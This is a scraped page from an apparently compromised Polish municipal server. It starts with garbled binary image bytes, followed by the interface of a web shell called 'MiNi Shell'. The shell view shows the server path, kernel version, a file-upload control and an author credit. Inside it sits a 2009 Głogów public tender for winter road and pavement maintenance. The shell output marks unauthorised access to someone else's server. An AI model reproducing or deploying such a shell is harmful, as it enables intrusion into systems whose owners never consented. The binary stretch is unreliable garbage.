JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20091014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20091014/177973-N-2009.html

<p class="kh_header"><b>Głogów: Zimowe utrzymanie jezdni i chodników powiatowych i gminnych położonych w granicach administracyjnych miasta Głogowa</b><br>
<b>Numer ogłoszenia: 177973 - 2009; data zamieszczenia: 14.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie jezdni i chodników powiatowych i gminnych położonych w granicach administracyjnych miasta Głogowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I Opis przedmiotu zamówienia:

Przedmiotem zamówienia są usługi w zakresie zimowego utrzymania jezdni 
i chodników powiatowych i gminnych
Zakres  robót:
- długość  jezdni  	 	jezdnie powiatowe  - 20,563 km  
					jezdnie gminne       - 43,153 km 
- powierzchnia chodników   	chodniki  powiatowe  - 40372,05 m2  
					chodniki  gminne       - 87971,80 m2  

Podana długość jezdni oraz powierzchnia  chodników dotyczy zamówienia obejmującego okres jednego roku.
a)   likwidacja śliskości jezdni przy użyciu soli ( chlorek sodu suchy NaCl lub zwilżony solanką ) oraz mieszanki piasku i soli. Szerokość posypywania powinna obejmować 90 % rzeczywistej szerokości nawierzchni jezdni liczonej od osi jezdni do prawego 
krawężnika oraz od krawężnika do krawężnika w przypadku jezdni jednokierunkowej; 
b)	odśnieżanie jezdni - szerokość odśnieżania obejmuje całą szerokość jezdni łącznie z zatokami przystankowymi. Szczególnie dokładnie należy wykonać odśnieżanie przy prawym  krawężniku, aby  odkryć  studzienki  odwadniające. Szerokość odśnieżania 1-go roboczego pasa jezdni jednym pługiem nie może być mniejsza od 2,5 m, co w przypadku pługów pracujących w zespole daje wielokrotność szerokości odśnieżanego pasa jezdni. W okresie występowania zwiększonych opadów śniegu należy mechanicznie oczyszczać obsługiwane ulice,
c)	odśnieżanie ciągów pieszych
d)	likwidacja śliskości ciągów pieszych przy użyciu piasku
e)	likwidacja śliskości jezdni
f)	sprzątanie nagromadzonego materiału użytego do likwidacji śliskości po okresie zimowym,
g)	dyżur dyspozycyjny sprzętu z operatorem ,
h)	ustala się czas na likwidację skutków występującego zjawiska w ciągu:
.	4  godziny - dla jezdni II kolejności zimowego utrzymania
.	6  godziny - dla jezdni III kolejności zimowego utrzymania
.	8  godziny - dla jezdni IV kolejności zimowego utrzymania

Materiały użyte do wykonania przedmiotu zamówienia powinny być zgodne z Rozporządzeniem Ministra Środowiska z dnia 27 października 2005 r. w sprawie rodzajów i warunków stosowania środków, jakie mogą być używane na drogach publicznych oraz ulicach i placach.
Wykaz jezdni i chodników powiatowych  i gminnych przeznaczonych do zimowego utrzymania zawiera  załącznik nr 1a i 1b   do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 15.000 zł (słownie: piętnaście tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy zgodnie z art. 22 ustawy Prawo zamówień publicznych:

§	posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
§	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
§	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
zamówienia,
§	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

2.	Wykonawca nie może podlegać wykluczeniu na podstawie art. 24 ustawy Pzp
3.	Wykonawca musi wykazać, że w ciągu ostatnich 3 lat, wykonał zamówienie dotyczące zimowego utrzymania jezdni i chodników - w formie załączonego do oferty oświadczenia z podaniem nazwy i danych zleceniodawcy, zakresu zamówienia, terminów wykonania na kwotę co najmniej 400.000 zł, potwierdzonego stosownym dokumentem uprzedniego zleceniodawcy (referencje) o należytym wykonaniu zamówienia.
4.	Wykonawca musi przedstawić wykaz osób lub podmiotów przewidzianych do wykonania przedmiotu zamówienia, tj. Dyżurny: osoba (osoby) wyznaczona do porozumiewania się z Zamawiającym, znająca tematykę zimowego utrzymania dróg, do której należałoby dysponowanie sprzętem i pojazdami, przyjmowanie interwencji, przekazywanie telefonicznie informacji o stanie dróg z danego terenu  do wskazanej przez Zamawiającego osoby. Ponadto Wykonawca musi wskazać osobę odpowiedzialną za prowadzenie zimowego utrzymania i mogącą podejmować decyzje związane z zimowym utrzymaniem dróg, z którą będzie się mógł kontaktować przedstawiciel Zamawiającego.
5.	Wykonawca musi wykazać, że dysponuje potencjałem sprzętowym lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego. 
6.	Wykonawca musi przedstawić informację z banku, w którym posiada rachunek bankowy, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy  w wysokości  300.000. zł.
7.	Posiadać system GPS w pojazdach z możliwością podglądu  trasy przejazdu pojazdów przeznaczonych do zimowego utrzymania dróg i chodników w sezonie 2009/2010, oraz umożliwić Zamawiającemu dostęp do tego systemu na komputerze  mobilnym celem podglądu i weryfikacji trasy.
8.	Wykonawca zobowiązany jest do prowadzenia dzienników dyżurów zimowego utrzymania dróg i chodników oraz  przedstawienie ich na każde żądanie Zamawiającego oraz składania meldunków o stanie dróg do Zamawiającego. Wykonawca ustanowi osobę odpowiedzialną za prowadzenie zimowego utrzymania dróg.
9.	Wykonawca  podczas akcji zima będzie  miał  obowiązek  reagowania  w  ciągu 15 minut  ( podjęcie akcji czynnej ) na telefoniczne zgłoszenie od Zamawiającego, policji, straży pożarnej, pogotowia ratunkowego, komunikacji miejskiej, a następnie potwierdzał wyjazdy u Zamawiającego.
10.	Przed podpisaniem umowy Wykonawca przedstawi Zamawiającemu dokument potwierdzający posiadanie  lub dysponowanie (umowa najmu, umowa dzierżawy) bazą dla pojazdów zlokalizowaną na terenie Głogowa. W przypadku nie dostarczenia żądanego dokumentu Zamawiający potraktuje to jako odmowę podpisania umowy. W związku z powyższym na podstawie art. 46 ust. 5 p. 1 Wykonawca utraci wadium.

Zamawiający nie dopuszcza udziału podwykonawców  w przedmiotowym postępowaniu. 
Zamawiający dokona oceny spełnienia warunków na podstawie złożonych dokumentów na zasadzie spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Formularz ofertowy zał. Nr 1 
2. Oświadczenie o spełnianiu warunków udziału w postępowaniu na podst. Art. 22 ust.1 ustawy Prawo zamówień publicznych. zał. Nr 2
3.  Oświadczenie o spełnianiu warunków udziału w postępowaniu na podst. Art. 24 ustawy Prawo zamówień publicznych. zał. Nr 3 
4.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
Zaświadczenie o wpisie do ewidencji działalności musi posiadać adnotację właściwego organu wydającego to zaświadczenie o aktualności zapisów dokonaną w terminie jak wyżej.
5.	Aktualne zaświadczenia od właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z płaceniem podatków, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymuje wykonanie decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
6. Wykaz wykonanych w ciągu ostatnich 3 lat usług odpowiadających swoim rodzajem 
i wartością usługom, stanowiącym przedmiot zamówienia, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że usługi zostały wykonane z należytą starannością, na . zał. Nr 4
7. Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć 
w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności zał. Nr 5 
8. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca, tj. posiada lub dysponuje sprzętem umożliwiającym wykonanie przedmiotu zamówienia, 
.	Zamawiający wymaga - co najmniej 4 pojazdy do likwidacji śliskości oraz  śniegu na jezdniach i co najmniej 3 pojazdy do utrzymania zimowego chodników i placów, jak i  wykazanie dysponowania wytwornicą solanki ze zdolnością zabezpieczenia roztworu dla  co najmniej 2 samochodów 
9. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje   Wykonawca, przedstawić należy w  zał. Nr 6 
10Dowód wniesienia wadium
11.Polisę, a  w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 300.000 zł
12. Informacja z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w  której Wykonawca posiada  rachunek, potwierdzającej wysokość posiadanych środków finansowych lub  zdolności kredytowej w kwocie co najmniej 300.000 zł., wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
13. Zezwolenie Starosty na wytwarzanie i transport odpadów wydane na podstawie ustawy 
z dnia 27 kwietnia 2001 r. o odpadach (Dz. U. z 2007 r., Nr 62 poz.628 ze  zmianami)
14. Oświadczenie o posiadaniu lub dysponowaniu (na czas trwania umowy) bazą pojazdów przeznaczonych do zimowego utrzymania zlokalizowaną na terenie Głogowa.
      

Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu, jeżeli złożona przez Wykonawcę kserokopia jest nieczytelna lub budzi uzasadnione wątpliwości co do jej prawdziwości, a Zamawiający nie może sprawdzić jej prawdziwości w inny sposób.
Zamawiający wezwie wykonawców, którzy w wyznaczonym terminie nie złożą dokumentów potwierdzających spełnienie warunków udziału w postępowaniu do uzupełnienia tych dokumentów w określonym terminie.

W przypadku składania oferty wspólnej przez kilku wykonawców, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Głogów
Rynek 10
67-200 Głogów
pok. 314.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2009 godzina 09:00, miejsce: Urząd Miejski Głogów
Rynek 10
67-200 Głogów
sekretariat - I piętro, pok. 125.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com